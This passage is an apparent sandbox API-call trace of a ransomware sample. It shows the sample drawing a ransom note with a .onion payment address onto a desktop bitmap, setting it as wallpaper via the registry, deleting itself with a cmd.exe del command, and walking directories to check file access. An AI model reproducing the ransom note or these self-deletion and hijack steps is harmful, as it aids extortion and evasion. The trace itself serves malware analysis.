lpOverlapped=0x0) returned 1 [0111.910] CloseHandle (hObject=0x330) returned 1 [0111.929] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\lukitus.bmp", lpFindFileData=0x18f938 | out: lpFindFileData=0x18f938) returned 0xffffffff [0111.929] GetDC (hWnd=0x0) returned 0x2b0107d4 [0111.929] CreateCompatibleDC (hdc=0x2b0107d4) returned 0x3f010916 [0111.929] GetDeviceCaps (hdc=0x3f010916, index=90) returned 96 [0111.929] MulDiv (nNumber=18, nNumerator=96, nDenominator=72) returned 24 [0111.929] CreateFontA (cHeight=-24, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x1, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Tahoma") returned 0x390a0792 [0111.930] SelectObject (hdc=0x3f010916, h=0x390a0792) returned 0x18a002e [0111.930] DrawTextW (in: hdc=0x3f010916, lpchText="$=*=.*\r\n+|=*+-\r\n$|-*=*.~~=__+*|\r\n++$$_=-*+-_$-+_|~~_|\r\n !!! IMPORTANT INFORMATION !!!!\r\n\r\nAll of your files are encrypted with RSA-2048 and AES-128 ciphers.\r\nMore information about the RSA and AES can be found here:\r\n http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n http://en.wikipedia.org/wiki/Advanced_Encryption_Standard\r\n \r\nDecrypting of your files is only possible with the private key and decrypt program, which is on our secret server.\r\nTo receive your private key follow one of the links:\r\n\r\n\r\nIf all of this addresses are not available, follow these steps:\r\n 1. Download and install Tor Browser: https://www.torproject.org/download/download-easy.html\r\n 2. After a successful installation, run the browser and wait for initialization.\r\n 3. Type in the address bar: g46mbrrzpfszonuk.onion/F56924BE966341BB\r\n 4. Follow the instructions on the site.\r\n\r\n!!! Your personal identification ID: F56924BE966341BB !!!\r\n_.~.*-_*$$+_~=_|~.\r\n=_*~$-+|$+\r\n", cchText=986, lprc=0x18fb4c, format=0x400 | out: lpchText="$=*=.*\r\n+|=*+-\r\n$|-*=*.~~=__+*|\r\n++$$_=-*+-_$-+_|~~_|\r\n !!! IMPORTANT INFORMATION !!!!\r\n\r\nAll of your files are encrypted with RSA-2048 and AES-128 ciphers.\r\nMore information about the RSA and AES can be found here:\r\n http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n http://en.wikipedia.org/wiki/Advanced_Encryption_Standard\r\n \r\nDecrypting of your files is only possible with the private key and decrypt program, which is on our secret server.\r\nTo receive your private key follow one of the links:\r\n\r\n\r\nIf all of this addresses are not available, follow these steps:\r\n 1. Download and install Tor Browser: https://www.torproject.org/download/download-easy.html\r\n 2. After a successful installation, run the browser and wait for initialization.\r\n 3. Type in the address bar: g46mbrrzpfszonuk.onion/F56924BE966341BB\r\n 4. Follow the instructions on the site.\r\n\r\n!!! Your personal identification ID: F56924BE966341BB !!!\r\n_.~.*-_*$$+_~=_|~.\r\n=_*~$-+|$+\r\n", lprc=0x18fb4c) returned 725 [0112.086] CreateCompatibleBitmap (hdc=0x2b0107d4, cx=1229, cy=757) returned 0x7a050793 [0112.089] SelectObject (hdc=0x3f010916, h=0x7a050793) returned 0x185000f [0112.089] CreateSolidBrush (color=0x404040) returned 0x7100919 [0112.089] FillRect (hDC=0x3f010916, lprc=0x18fafc, hbr=0x7100919) returned 1 [0112.101] DeleteObject (ho=0x7100919) returned 1 [0112.101] SetTextColor (hdc=0x3f010916, color=0x8080ff) returned 0x0 [0112.101] SetBkMode (hdc=0x3f010916, mode=1) returned 2 [0112.102] DrawTextW (in: hdc=0x3f010916, lpchText="$=*=.*\r\n+|=*+-\r\n$|-*=*.~~=__+*|\r\n++$$_=-*+-_$-+_|~~_|\r\n !!! IMPORTANT INFORMATION !!!!\r\n\r\nAll of your files are encrypted with RSA-2048 and AES-128 ciphers.\r\nMore information about the RSA and AES can be found here:\r\n http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n http://en.wikipedia.org/wiki/Advanced_Encryption_Standard\r\n \r\nDecrypting of your files is only possible with the private key and decrypt program, which is on our secret server.\r\nTo receive your private key follow one of the links:\r\n\r\n\r\nIf all of this addresses are not available, follow these steps:\r\n 1. Download and install Tor Browser: https://www.torproject.org/download/download-easy.html\r\n 2. After a successful installation, run the browser and wait for initialization.\r\n 3. Type in the address bar: g46mbrrzpfszonuk.onion/F56924BE966341BB\r\n 4. Follow the instructions on the site.\r\n\r\n!!! Your personal identification ID: F56924BE966341BB !!!\r\n_.~.*-_*$$+_~=_|~.\r\n=_*~$-+|$+\r\n", cchText=986, lprc=0x18fb4c, format=0x0 | out: lpchText="$=*=.*\r\n+|=*+-\r\n$|-*=*.~~=__+*|\r\n++$$_=-*+-_$-+_|~~_|\r\n !!! IMPORTANT INFORMATION !!!!\r\n\r\nAll of your files are encrypted with RSA-2048 and AES-128 ciphers.\r\nMore information about the RSA and AES can be found here:\r\n http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n http://en.wikipedia.org/wiki/Advanced_Encryption_Standard\r\n \r\nDecrypting of your files is only possible with the private key and decrypt program, which is on our secret server.\r\nTo receive your private key follow one of the links:\r\n\r\n\r\nIf all of this addresses are not available, follow these steps:\r\n 1. Download and install Tor Browser: https://www.torproject.org/download/download-easy.html\r\n 2. After a successful installation, run the browser and wait for initialization.\r\n 3. Type in the address bar: g46mbrrzpfszonuk.onion/F56924BE966341BB\r\n 4. Follow the instructions on the site.\r\n\r\n!!! Your personal identification ID: F56924BE966341BB !!!\r\n_.~.*-_*$$+_~=_|~.\r\n=_*~$-+|$+\r\n", lprc=0x18fb4c) returned 725 [0112.121] CreateSolidBrush (color=0xff00) returned 0x8100919 [0112.121] FrameRect (hDC=0x3f010916, lprc=0x18faec, hbr=0x8100919) returned 1 [0112.121] DeleteObject (ho=0x8100919) returned 1 [0112.121] GetObjectA (in: h=0x7a050793, c=24, pv=0x18fb18 | out: pv=0x18fb18) returned 24 [0112.161] GetDIBits (in: hdc=0x3f010916, hbm=0x7a050793, start=0x0, cLines=0x2f5, lpvBits=0x3880056, lpbmi=0x388002e, usage=0x0 | out: lpvBits=0x3880056, lpbmi=0x388002e) returned 757 [0112.192] DeleteObject (ho=0x7a050793) returned 1 [0112.192] DeleteObject (ho=0x390a0792) returned 1 [0112.192] DeleteDC (hdc=0x3f010916) returned 1 [0112.193] ReleaseDC (hWnd=0x0, hDC=0x2b0107d4) returned 1 [0112.193] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\Desktop\\lukitus.bmp" (normalized: "c:\\users\\aetadzjz\\desktop\\lukitus.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0112.193] DeviceIoControl (in: hDevice=0x32c, dwIoControlCode=0x9c040, lpInBuffer=0x18fb74*, nInBufferSize=0x2, lpOutBuffer=0x0, nOutBufferSize=0x0, lpBytesReturned=0x18fb68, lpOverlapped=0x0 | out: lpInBuffer=0x18fb74*, lpOutBuffer=0x0*, lpBytesReturned=0x18fb68*=0x0, lpOverlapped=0x0) returned 1 [0112.193] WriteFile (in: hFile=0x32c, lpBuffer=0x3880020*, nNumberOfBytesToWrite=0x38c8fa, lpNumberOfBytesWritten=0x18fb5c, lpOverlapped=0x0 | out: lpBuffer=0x3880020*, lpNumberOfBytesWritten=0x18fb5c*=0x38c8fa, lpOverlapped=0x0) returned 1 [0112.241] CloseHandle (hObject=0x32c) returned 1 [0112.318] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", ulOptions=0x0, samDesired=0x2001f, phkResult=0x18fcd0 | out: phkResult=0x18fcd0*=0x32c) returned 0x0 [0112.318] RegSetValueExA (in: hKey=0x32c, lpValueName="WallpaperStyle", Reserved=0x0, dwType=0x1, lpData="0", cbData=0x2 | out: lpData="0") returned 0x0 [0112.318] RegSetValueExA (in: hKey=0x32c, lpValueName="TileWallpaper", Reserved=0x0, dwType=0x1, lpData="0", cbData=0x2 | out: lpData="0") returned 0x0 [0112.318] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x28a8700, fWinIni=0x3 | out: pvParam=0x28a8700) returned 1 [0112.889] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="C:\\Users\\aETAdzjz\\Desktop\\lukitus.htm", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0114.523] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="C:\\Users\\aETAdzjz\\Desktop\\lukitus.bmp", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0115.351] RegCloseKey (hKey=0x32c) returned 0x0 [0115.351] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f814, nSize=0x208 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\agraba8.exe")) returned 0x30 [0115.351] GetTempPathW (in: nBufferLength=0x208, lpBuffer=0x18f810 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 0x25 [0115.351] SetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe", dwFileAttributes=0x80) returned 1 [0115.352] MoveFileExW (lpExistingFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\agraba8.exe"), lpNewFileName=0x0, dwFlags=0x4) returned 0 [0115.352] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /C del /Q /F \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x50, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fbc0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fc04 | out: lpCommandLine="cmd.exe /C del /Q /F \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe\"", lpProcessInformation=0x18fc04*(hProcess=0x340, hThread=0x32c, dwProcessId=0x7b0, dwThreadId=0x348)) returned 1 [0115.382] CloseHandle (hObject=0x340) returned 1 [0115.382] CloseHandle (hObject=0x32c) returned 1 [0115.383] ExitProcess (uExitCode=0x0) Thread: id = 37 os_tid = 0xb90 Thread: id = 39 os_tid = 0x894 Thread: id = 40 os_tid = 0x8a4 Thread: id = 41 os_tid = 0x8b4 Thread: id = 42 os_tid = 0x8c4 Thread: id = 43 os_tid = 0x8d4 Thread: id = 45 os_tid = 0x880 [0105.835] GetCurrentThread () returned 0xfffffffe [0105.835] SetThreadPriority (hThread=0xfffffffe, nPriority=-2) returned 1 [0105.838] FindFirstFileW (in: lpFileName="c:\\*", lpFindFileData=0x281cbe4 | out: lpFindFileData=0x281cbe4) returned 0x5fc258 [0105.838] GetFileSecurityW (in: lpFileName="c:", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281cbc0 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281cbc0) returned 0 [0105.838] GetLastError () returned 0x7a [0105.838] GetFileSecurityW (in: lpFileName="c:", RequestedInformation=0x7, pSecurityDescriptor=0x572758, nLength=0xa4, lpnLengthNeeded=0x281cbc0 | out: pSecurityDescriptor=0x572758, lpnLengthNeeded=0x281cbc0) returned 1 [0105.838] GetLastError () returned 0x7a [0105.838] GetCurrentThread () returned 0xfffffffe [0105.838] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281cbc8 | out: TokenHandle=0x281cbc8*=0x0) returned 0 [0105.838] GetCurrentProcess () returned 0xffffffff [0105.838] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281cbc8 | out: TokenHandle=0x281cbc8*=0x324) returned 1 [0105.838] DuplicateToken (in: ExistingTokenHandle=0x324, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281cbc4 | out: DuplicateTokenHandle=0x281cbc4*=0x32c) returned 1 [0105.838] MapGenericMask (in: AccessMask=0x281cbd4, GenericMapping=0x281cba4 | out: AccessMask=0x281cbd4) [0105.839] AccessCheck (in: pSecurityDescriptor=0x572758, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281cba4, PrivilegeSet=0x281cb90, PrivilegeSetLength=0x281cbb4, GrantedAccess=0x281cbb8, AccessStatus=0x281cbbc | out: PrivilegeSet=0x281cb90, PrivilegeSetLength=0x281cbb4, GrantedAccess=0x281cbb8, AccessStatus=0x281cbbc) returned 1 [0105.839] CloseHandle (hObject=0x32c) returned 1 [0105.839] CloseHandle (hObject=0x324) returned 1 [0105.839] FindNextFileW (in: hFindFile=0x5fc258, lpFindFileData=0x281cbe4 | out: lpFindFileData=0x281cbe4) returned 1 [0105.839] FindNextFileW (in: hFindFile=0x5fc258, lpFindFileData=0x281cbe4 | out: lpFindFileData=0x281cbe4) returned 1 [0105.839] FindNextFileW (in: hFindFile=0x5fc258, lpFindFileData=0x281cbe4 | out: lpFindFileData=0x281cbe4) returned 1 [0105.839] FindNextFileW (in: hFindFile=0x5fc258, lpFindFileData=0x281cbe4 | out: lpFindFileData=0x281cbe4) returned 1 [0105.839] FindNextFileW (in: hFindFile=0x5fc258, lpFindFileData=0x281cbe4 | out: lpFindFileData=0x281cbe4) returned 1 [0105.839] FindNextFileW (in: hFindFile=0x5fc258, lpFindFileData=0x281cbe4 | out: lpFindFileData=0x281cbe4) returned 1 [0105.839] FindNextFileW (in: hFindFile=0x5fc258, lpFindFileData=0x281cbe4 | out: lpFindFileData=0x281cbe4) returned 1 [0105.839] FindFirstFileW (in: lpFileName="c:\\PerfLogs\\*", lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 0xffffffff [0105.839] FindNextFileW (in: hFindFile=0x5fc258, lpFindFileData=0x281cbe4 | out: lpFindFileData=0x281cbe4) returned 1 [0105.839] FindNextFileW (in: hFindFile=0x5fc258, lpFindFileData=0x281cbe4 | out: lpFindFileData=0x281cbe4) returned 1 [0105.839] FindNextFileW (in: hFindFile=0x5fc258, lpFindFileData=0x281cbe4 | out: lpFindFileData=0x281cbe4) returned 1 [0105.839] FindFirstFileW (in: lpFileName="c:\\ProgramData\\*", lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 0x5fc298 [0105.839] GetFileSecurityW (in: lpFileName="c:\\ProgramData", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281c628 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281c628) returned 0 [0105.839] GetLastError () returned 0x7a [0105.839] GetFileSecurityW (in: lpFileName="c:\\ProgramData", RequestedInformation=0x7, pSecurityDescriptor=0x572758, nLength=0xac, lpnLengthNeeded=0x281c628 | out: pSecurityDescriptor=0x572758, lpnLengthNeeded=0x281c628) returned 1 [0105.839] GetLastError () returned 0x7a [0105.839] GetCurrentThread () returned 0xfffffffe [0105.839] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281c630 | out: TokenHandle=0x281c630*=0x0) returned 0 [0105.839] GetCurrentProcess () returned 0xffffffff [0105.839] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281c630 | out: TokenHandle=0x281c630*=0x32c) returned 1 [0105.840] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281c62c | out: DuplicateTokenHandle=0x281c62c*=0x330) returned 1 [0105.840] MapGenericMask (in: AccessMask=0x281c63c, GenericMapping=0x281c60c | out: AccessMask=0x281c63c) [0105.840] AccessCheck (in: pSecurityDescriptor=0x572758, ClientToken=0x330, DesiredAccess=0x120116, GenericMapping=0x281c60c, PrivilegeSet=0x281c5f8, PrivilegeSetLength=0x281c61c, GrantedAccess=0x281c620, AccessStatus=0x281c624 | out: PrivilegeSet=0x281c5f8, PrivilegeSetLength=0x281c61c, GrantedAccess=0x281c620, AccessStatus=0x281c624) returned 1 [0105.840] CloseHandle (hObject=0x330) returned 1 [0105.840] CloseHandle (hObject=0x32c) returned 1 [0105.840] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0105.840] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0105.840] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Adobe\\*", lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0x5fc2d8 [0105.849] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Adobe", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281c090) returned 0 [0105.849] GetLastError () returned 0x7a [0105.849] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Adobe", RequestedInformation=0x7, pSecurityDescriptor=0x5727b8, nLength=0xa4, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x5727b8, lpnLengthNeeded=0x281c090) returned 1 [0105.849] GetLastError () returned 0x7a [0105.849] GetCurrentThread () returned 0xfffffffe [0105.849] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x0) returned 0 [0105.849] GetCurrentProcess () returned 0xffffffff [0105.849] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x334) returned 1 [0105.849] DuplicateToken (in: ExistingTokenHandle=0x334, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281c094 | out: DuplicateTokenHandle=0x281c094*=0x338) returned 1 [0105.849] MapGenericMask (in: AccessMask=0x281c0a4, GenericMapping=0x281c074 | out: AccessMask=0x281c0a4) [0105.849] AccessCheck (in: pSecurityDescriptor=0x5727b8, ClientToken=0x338, DesiredAccess=0x120116, GenericMapping=0x281c074, PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c | out: PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c) returned 1 [0105.849] CloseHandle (hObject=0x338) returned 1 [0105.849] CloseHandle (hObject=0x334) returned 1 [0105.849] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0105.850] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0105.850] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Adobe\\Acrobat\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0105.850] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Adobe\\Acrobat", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0105.850] GetLastError () returned 0x7a [0105.850] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Adobe\\Acrobat", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0xa4, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281baf8) returned 1 [0105.850] GetLastError () returned 0x7a [0105.850] GetCurrentThread () returned 0xfffffffe [0105.850] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0105.850] GetCurrentProcess () returned 0xffffffff [0105.850] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x338) returned 1 [0105.850] DuplicateToken (in: ExistingTokenHandle=0x338, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x33c) returned 1 [0105.850] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0105.850] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x33c, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0105.850] CloseHandle (hObject=0x33c) returned 1 [0105.850] CloseHandle (hObject=0x338) returned 1 [0105.850] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0105.850] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0105.850] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0105.851] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Adobe\\Acrobat\\10.0", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0105.851] GetLastError () returned 0x7a [0105.851] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Adobe\\Acrobat\\10.0", RequestedInformation=0x7, pSecurityDescriptor=0x571668, nLength=0xa4, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x571668, lpnLengthNeeded=0x281b560) returned 1 [0105.851] GetLastError () returned 0x7a [0105.851] GetCurrentThread () returned 0xfffffffe [0105.851] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0105.851] GetCurrentProcess () returned 0xffffffff [0105.851] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x33c) returned 1 [0105.851] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x340) returned 1 [0105.851] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0105.851] AccessCheck (in: pSecurityDescriptor=0x571668, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0105.851] CloseHandle (hObject=0x340) returned 1 [0105.851] CloseHandle (hObject=0x33c) returned 1 [0105.851] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.851] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.851] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc398 [0105.852] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0105.852] GetLastError () returned 0x7a [0105.852] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate", RequestedInformation=0x7, pSecurityDescriptor=0x571668, nLength=0xa4, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x571668, lpnLengthNeeded=0x281afc8) returned 1 [0105.852] GetLastError () returned 0x7a [0105.852] GetCurrentThread () returned 0xfffffffe [0105.852] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0105.852] GetCurrentProcess () returned 0xffffffff [0105.852] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x340) returned 1 [0105.852] DuplicateToken (in: ExistingTokenHandle=0x340, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x344) returned 1 [0105.852] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0105.852] AccessCheck (in: pSecurityDescriptor=0x571668, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0105.852] CloseHandle (hObject=0x344) returned 1 [0105.852] CloseHandle (hObject=0x340) returned 1 [0105.852] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.852] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.852] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 0x5fc3d8 [0105.853] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281aa30 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281aa30) returned 0 [0105.853] GetLastError () returned 0x7a [0105.853] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xa4, lpnLengthNeeded=0x281aa30 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281aa30) returned 1 [0105.853] GetLastError () returned 0x7a [0105.853] GetCurrentThread () returned 0xfffffffe [0105.853] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281aa38 | out: TokenHandle=0x281aa38*=0x0) returned 0 [0105.853] GetCurrentProcess () returned 0xffffffff [0105.853] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281aa38 | out: TokenHandle=0x281aa38*=0x344) returned 1 [0105.853] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281aa34 | out: DuplicateTokenHandle=0x281aa34*=0x348) returned 1 [0105.853] MapGenericMask (in: AccessMask=0x281aa44, GenericMapping=0x281aa14 | out: AccessMask=0x281aa44) [0105.853] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x348, DesiredAccess=0x120116, GenericMapping=0x281aa14, PrivilegeSet=0x281aa00, PrivilegeSetLength=0x281aa24, GrantedAccess=0x281aa28, AccessStatus=0x281aa2c | out: PrivilegeSet=0x281aa00, PrivilegeSetLength=0x281aa24, GrantedAccess=0x281aa28, AccessStatus=0x281aa2c) returned 1 [0105.853] CloseHandle (hObject=0x348) returned 1 [0105.853] CloseHandle (hObject=0x344) returned 1 [0105.853] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0105.853] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0105.853] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 0 [0105.853] FindClose (in: hFindFile=0x5fc3d8 | out: hFindFile=0x5fc3d8) returned 1 [0105.854] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0105.854] FindClose (in: hFindFile=0x5fc398 | out: hFindFile=0x5fc398) returned 1 [0105.854] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0105.854] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0105.854] FindNextFileW (in: 